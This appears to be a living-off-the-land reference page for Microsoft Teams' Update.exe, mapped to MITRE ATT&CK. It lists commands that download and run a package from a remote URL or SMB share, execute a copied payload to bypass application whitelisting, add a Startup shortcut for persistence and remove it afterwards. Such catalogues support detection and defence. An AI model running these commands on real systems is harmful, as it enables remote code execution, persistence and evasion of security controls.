.. /Update.exe
Star

Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.


Paths:

Resources:
Acknowledgements:

Detection:

Download

The above binary will go to url and look for RELEASES file and download the nuget package.
Update.exe --download [url to package]
Usecase: Download binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1218



AWL bypass

The above binary will go to url and look for RELEASES file, download and install the nuget package.
Update.exe --update=[url to package]
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1218



The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Update.exe --update=\\remoteserver\payloadFolder
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1218



The above binary will go to url and look for RELEASES file, download and install the nuget package.
Update.exe --updateRollback=[url to package]
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1218



Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Update.exe --processStart payload.exe --process-start-args "whatever args"
Usecase: Application Whitelisting Bypass
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1218



The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Update.exe --updateRollback=\\remoteserver\payloadFolder
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1218



Execute

The above binary will go to url and look for RELEASES file, download and install the nuget package.
Update.exe --update=[url to package]
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1218



The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Update.exe --update=\\remoteserver\payloadFolder
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1218



The above binary will go to url and look for RELEASES file, download and install the nuget package.
Update.exe --updateRollback=[url to package]
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1218



The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Update.exe --updateRollback=\\remoteserver\payloadFolder
Usecase: Download and execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1218



Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Update.exe --processStart payload.exe --process-start-args "whatever args"
Usecase: Execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1218



Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
Update.exe --createShortcut=payload.exe -l=Startup
Usecase: Execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1547



Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
Update.exe --removeShortcut=payload.exe -l=Startup
Usecase: Execute binary
Privileges required: User
OS: Windows 7 and up with Microsoft Teams installed
MITRE ATT&CK®: T1070